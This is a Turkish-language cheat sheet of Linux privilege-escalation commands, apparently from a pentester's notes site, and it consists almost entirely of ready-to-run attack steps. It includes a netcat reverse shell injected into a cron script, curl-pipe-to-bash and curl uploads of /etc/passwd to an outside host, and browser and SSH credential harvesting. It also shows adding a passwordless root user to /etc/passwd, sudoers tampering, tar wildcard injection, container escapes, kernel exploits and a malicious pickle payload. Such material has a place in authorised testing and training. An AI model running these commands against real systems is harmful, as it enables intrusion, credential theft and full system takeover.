Linux Privilege Escalation

Shell Upgrade

# Python varsa
python3 -c 'import pty; pty.spawn("/bin/bash")'
python2 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'

# Python yoksa
script /dev/null -qc /bin/bash

# Sonrasında
CTRL + Z

stty size # Buradaki değeri altta giriyoruz
stty raw -echo; fg; ls;
export SHELL=/bin/bash; export TERM=xterm;
stty rows 181 columns 42; reset;

Kullanıcı ve Gruplar

id # Aktif kullanıcı ve grup
env # Ortam Değişkenleri
history # Kullanıcının komut geçmişi
getent group sudo # Gruptaki kullanıcılar
lastlog # Kullanıcının son girişleri
w # Giriş yapmış kullanıcılar

cat /etc/passwd # Tüm kullanıcılar
cat /etc/group # Gruplar

realm list # Domain bilgisi
klist # Kerberos biletleri

Sistem Bilgileri

hostname # Hostname
uname -a # Kernel Versiyon
cat /etc/os-release # İşletim sistemi
cat /etc/issue # Login ekranındaki sistem bilgileri
cat /etc/shells # Bütün sheller
cat /etc/fstab # Mount edilmiş diskler

dpkg -l # Yüklü Uygulamalar
echo $PATH # Path Değişkeni
mount # Mount edilmiş dizin
lsblk # Diskler
lsmod # Kernel Modülleri
/sbin/modinfo libata # Modülün detayları
ps aux # Bütün processler
pspy64 # Process dinleme
timeout 20 ./pspy64 # 20 saniye çalıştır

grep -Ril "aranacak_kelime" / 2>/dev/null # Kelime Arama
find / -name flag.txt 2>/dev/null # Dosya Arama
ls /tmp # Geçici dizin
ls /dev/shm # Geçici dizin

Ağ Bilgileri

# Ağ Arayüzleri
ip a
ifconfig a 
arp -a

# Açık Portlar
netstat -punta
ss -tulpn

# Yönlendirme Tablosu
route
cat /etc/networks
ip route

# Firewall Ayarları
cat /etc/iptables/rules.v4

# Localde Gelen Parolalar
sudo tcpdump -i lo -A | grep "pass"

cat /etc/hosts # Hosts dosyası
cat /etc/resolv.conf # DNS dosyası

Dosya Transferi

# Http Download
python3 -m http.server 80
wget 192.168.1.2/linpeas.sh -O /tmp/linpeas.sh
wget 192.168.1.2/linpeas.sh -O /dev/shm/linpeas.sh
curl -L  192.168.1.2/linpeas.sh -o /tmp/linpeas.sh
curl -L 192.168.1.2/linpeas.sh | bash

# Base64 Download Upload
cat id_rsa |base64 -w 0;echo
echo -n 'BASE64' | base64 -d > id_rsa

# Netcat Download Upload
nc -lvnp 1234 > file.txt
nc -q 0 192.168.1.3 1234 < file.txt

openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
python3 -m uploadserver 443 --server-certificate ~/server.pem
curl -X POST https://192.168.1.2/upload -F 'files=@/etc/passwd' --insecure

Önemli Dizinler

python2.7 laZagne.py all
python3 laZagne.py browsers
ls -l .mozilla/firefox/ | grep default 
cat .mozilla/firefox/1bplpd86.default-release/logins.json | jq .
python3.9 firefox_decrypt.py

# Configs
for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done


# Config Files
for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\|lib");do echo -e "\nFile: " $i; grep "user\|password\|pass" $i 2>/dev/null | grep -v "\#";done

find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null


find / -type f -iname "*config*" 

# Databases
for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man";done

# Notes
find /home/* -type f -name "*.txt" -o ! -name "*.*"

# Scripts
for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share";done

# Private Keys
grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"
grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"

# Public Keys
grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1"

# Bash History
tail -n5 /home/*/.bash*

# Documents
for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done

# Log Files
cat /var/log/messages
cat /var/log/syslog
cat /var/log/auth.log
cat /var/log/secure
cat /var/log/boot.log
cat /var/log/dmesg
cat /var/log/kern.log
cat /var/log/faillog
cat /var/log/cron
cat /var/log/mail.log
cat /var/log/httpd
cat /var/log/mysqld.log
cd /var/spool/mail # Mail dosyaları

cat /proc/self/environ # Env değişkenleri
cat /proc/self/cmdline # Servisin komutu


# Log Search
for i in $(ls /var/log/* 2>/dev/null);do GREP=$(grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null); if [[ $GREP ]];then echo -e "\n#### Log file: " $i; grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null;fi;done

# Kerberos Tickets
find / -name *keytab* -ls 2>/dev/null

# All Domain Credentials
./linikatz.sh

CronJobs

cat /etc/crontab
ls -lah /etc/cron* # Cronjob Listesi
cat /var/spool/cron/crontabs/root # Root Crontab
crontab -l # Kullanıcının Cronjob Listesi
sudo crontab -l # Root Cronjob Listesi
grep "CRON" /var/log/syslog # Sistem Loglarında Cronjob Arama
./pspy64 -pf -i 1000 # Processleri dinler

# Bütün Cronjoblar
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"

# Reverse Shell Exploit
ls -la /home/john/backup.sh
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.1.3 1234 >/tmp/f" > /home/john/backup.sh

# Root Shell Exploit
echo -e '#!/bin/bash\ncp /bin/bash /tmp/bash; chmod +s /tmp/bash' > backup.sh
/tmp/bash -ip

# Sudo Yetkisi ile Exploit
printf '#! /bin/bash\necho "john ALL=NOPASSWD:ALL" >> /etc/sudoers' > /home/john/backup.sh

World Writable Dosyalar

find / -type f -not -path "/proc/*" -not -path "/sys/*" -not -path "$HOME/*" -writable 2>/dev/null

# Eğer /etc/passwd var ise root kullanıcı ekleyebiliriz
openssl passwd password
echo "root2:xxxxxxxxxxxxxxx:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2

# Veya Parolasız
echo "root2::0:0:root:/root:/bin/bash" >> /etc/passwd

# Eğer shadow yazılabilir ise
mkpasswd -m yescrypt password
nano /etc/shadow

# Eski parolalar bu dosyada
cat /etc/security/opasswd


unshadow passwd shadow > unshadowed.hashes
hashcat -m 1800 -a 0 unshadowed.hashes /usr/share/rockyou.txt

SUID Binary

find / -user root -perm -4000 2>/dev/null
find / -user root -perm -6000 2>/dev/null

# Aşağıdaki Dosyalar Normal
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/bin/su
/bin/mount
/bin/umount

# Veya SUID ile işaretlenmiş bir dosya bizim değiştirebildiğimiz bir dosyayı kullanıyorsa
ls -la backup.sh # SUID Olan Dosya
ls -la backup.config # SUID Olan Dosyanın Çağırdığı Dosya

cp /bin/bash > backup.config
./backup.sh

SUDO

Bu komutlar ile hangi dosyaları sudo komutu ile çalıştırabileceğimizi görebiliriz.

sudo -l

# NOPASSWD:ALL ROOT olan bir sh dosyası varsa shell alabiliriz
sudo /usr/bin/backup.sh -c /bin/bash

Binary Capabilities

GTFOBins: https://gtfobins.github.io/

/usr/sbin/getcap -r / 2>/dev/null

# Bunlar gereksiz
#/usr/bin/ping = cap_net_raw+ep
#/usr/bin/mtr-packet = cap_net_raw+ep

Wildcard Abuse

Eğer bir cronjob'da * karakteri varsa aşağıdaki exploit uygulanabilir.

echo > "--checkpoint=1"
echo > "--checkpoint-action=exec=sh shell.sh"
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > shell.sh
chmod 777 shell.sh
/tmp/bash -ip

Yetkili Gruplar

id

# lxd Grup
lxc image import alpine.tar.gz --alias alpine
lxc init alpine r00t -c security.privileged=true
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true
lxc start r00t
lxc exec r00t /bin/bash

# Docker Grup
docker image ls
docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash

# Disk Grup

# Adm Grup
cd /var/log

Screen Privilege Esc

wget https://raw.githubusercontent.com/YasserREED/screen-v4.5.0-priv-escalate/refs/heads/main/exploit.sh
bash exploit.sh

Logrotten

# Crate veya compress varsa exploit çalışır
grep "create\|compress" /etc/logrotate.conf | grep -v "#"

wget https://raw.githubusercontent.com/whotwagner/logrotten/refs/heads/master/logrotten.c
gcc logrotten.c -o logrotten -static
./logrotten -p ./reverse /tmp/tmp.log

Shared Object Hijacking

ldd payroll
readelf -d payroll  | grep PATH
gcc rev.c -fPIC -shared -o /development/libshared.so

Python Module Permission

import psutil
available_memory = psutil.virtual_memory()

grep -r "def virtual_memory" /usr/local/lib/python3.8/dist-packages/psutil/*
ls -la /usr/local/lib/python3.8/dist-packages/psutil/__init__.py
vim /usr/local/lib/python3.8/dist-packages/psutil/__init__.py
os.system('id')

Automated

# Local
cp /usr/bin/unix-privesc-check .
cp /usr/share/peass/linpeas .
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
python -m http.server 80

# Target
cd /tmp
wget http://192.168.1.3/LinEnum.sh
wget http://192.168.1.3/linpeas
wget http://192.168.1.3/unix-privesc-check

chmod +x LinEnum.sh
chmod +x linpeas
chmod +x unix-privesc-check

./LinEnum.sh
./linpeas
./unix-privesc-check standard > output.txt

Firefox Creds

Decrypter: https://github.com/unode/firefox_decrypt

cat /root/.mozilla/firefox/x.default-esr/logins.json
cat /root/.mozilla/firefox/x.default-esr/cookies.sqlite
cat /root/.mozilla/firefox/x.default-esr/formhistory.sqlite
cat /root/.mozilla/firefox/x.default-esr/key4.db
cat /root/.mozilla/firefox/x.default-esr/logins.json

Kernel Exploit

cat /etc/issue
cat /etc/lsb-release
uname -r

searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" | grep  "4." | grep -v " < 4.4.0" | grep -v "4.8"
python -m http.server 80

wget http://192.168.1.3/cve-2017-16995.c
gcc cve-2017-16995.c -o cve-2017-16995
./cve-2017-16995

Sudo < 1.9.5p2

CVE-2021-3156: https://github.com/worawit/CVE-2021-3156

# Eğer zafiyetli ise sudoedit: /: not a regular file segfault hatası alırız
sudoedit -s /

sudo --version
sudo -V

python3 sudo_lpe.py

Dirty Pipe

Checker: https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker

DirtyPipe: https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits

uname -r # Hedef
dpipe.sh 5.10.0 # Local

gcc exploit-1.c -o dpipe1 -static
gcc exploit-2.c -o dpipe2 -static

./dpipe1
./dpipe2 /usr/bin/su

Screen 4.5.0

Exploit: https://github.com/YasserREED/screen-v4.5.0-priv-escalate

Pwnkit

wget https://github.com/ly4k/PwnKit/raw/refs/heads/main/PwnKit
./PwnKit

Pickle Priv Esc

import torch
import os

class Payload:
    def __reduce__(self):
        return (os.system, ("whoami",))

evil = Payload()
torch.save(evil, 'evil.pth')

APT-GET CronJob Priv Esc (/etc/apt/apt.conf.d)

cd /etc/apt/apt.conf.d
echo 'apt::Update::Pre-Invoke {"revshell"};' > shell

PreviousAV Evasion NextLinux Persistence

Last updated 7 months ago

hashtagShell Upgrade

hashtagKullanıcı ve Gruplar

hashtagSistem Bilgileri

hashtagAğ Bilgileri

hashtagDosya Transferi

hashtagÖnemli Dizinler

hashtagCronJobs

hashtagWorld Writable Dosyalar

hashtagSUID Binary

hashtagSUDO

hashtagBinary Capabilities

hashtagWildcard Abuse

hashtagYetkili Gruplar

hashtagScreen Privilege Esc

hashtagLogrotten

hashtagShared Object Hijacking

hashtagPython Module Permission

hashtagAutomated

hashtagFirefox Creds

hashtagKernel Exploit

hashtagSudo < 1.9.5p2

hashtagDirty Pipe

hashtagScreen 4.5.0

hashtagPwnkit

hashtagPickle Priv Esc

hashtagAPT-GET CronJob Priv Esc (/etc/apt/apt.conf.d)

Shell Upgrade

Kullanıcı ve Gruplar

Sistem Bilgileri

Ağ Bilgileri

Dosya Transferi

Önemli Dizinler

CronJobs

World Writable Dosyalar

SUID Binary

SUDO

Binary Capabilities

Wildcard Abuse

Yetkili Gruplar

Screen Privilege Esc

Logrotten

Shared Object Hijacking

Python Module Permission

Automated

Firefox Creds

Kernel Exploit

Sudo < 1.9.5p2

Dirty Pipe

Screen 4.5.0

Pwnkit

Pickle Priv Esc

APT-GET CronJob Priv Esc (/etc/apt/apt.conf.d)